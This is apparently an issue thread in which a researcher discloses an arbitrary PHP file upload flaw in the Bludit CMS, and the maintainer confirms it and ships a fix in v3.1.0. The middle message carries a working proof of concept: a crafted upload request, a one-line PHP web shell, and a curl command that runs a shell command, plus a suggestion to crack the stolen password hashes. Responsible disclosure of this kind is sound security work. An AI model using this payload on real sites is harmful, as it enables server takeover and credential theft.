Arbitrary File Upload - Security

[bousalman]

Hi There,

I was trying the application for a while and noticed that a regular user ( Editor role ) can upload arbitrary file, in this case a PHP file. By then he can run remote PHP command on server context.

Is it OK to describe the vulnerability here ? or you prefer to send it in private ?

Thanks.

[dignajar]

Hi,
is ok here, I'm checking and is true is possible to upload a PHP file, I going to fix it.
I don't find the way to execute it, can you show me some example?
Regards
Diego

[bousalman]

Hi Diego,

The uploading function for pictures is done by POSTing in "/admin/ajax/upload-files" , the Editor role User can upload pictures when he create or modify a content.

Now malicious user can modify the HTTP request to edit the photo content and name, here I am using a Burp suite proxy to do it:

POST /admin/ajax/upload-files HTTP/1.1
Host: 192.168.140.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.140.154/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close

-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"

67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png

<?php system($_GET["cmd"]);?>

-----------------------------26228568510541774541866388118--

and the response is:
{"status":0,"message":"Image uploaded success.","filename":"poc.php","absoluteURL":"http://192.168.140.154/bl-content/uploads/poc.php","absoluteURLThumbnail":"http://192.168.140.154/bl-content/uploads/thumbnails/poc.php","absolutePath":"/var/www/html/bl-content/uploads/poc.php"}

Next the malicious user can request the uploaded PHP file since the path is known from the HTTP response. Here I am running a system command using the PHP page:

root@kali:~# curl http://192.168.140.154/bl-content/uploads/poc.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

By now the malicious user have a remote command execution thru the web-shell, can run any terminal command he want. for example download the user database file ( XML ) and start cracking all users passwords since the hash is stored along with the salt.

Mitigation:
I did a quick code review, You should implement a whitelist for file extension that allow only photos ones.
Moreover some frameworks do inspection/processing for the photo files before saving it in the disk, this will corrupt the payload of the malicious user.

Thanks,

[dignajar]

Clear, I going to check the file extension, there is another way to check the EXIF data, but I need to add more requirements to the system and I don't want to add more complexity to the users.
Thanks for report it.

[bousalman]

You welcome, Glad I can help.

[dignajar]

Implemented in Bludit v3.1.0. Thanks!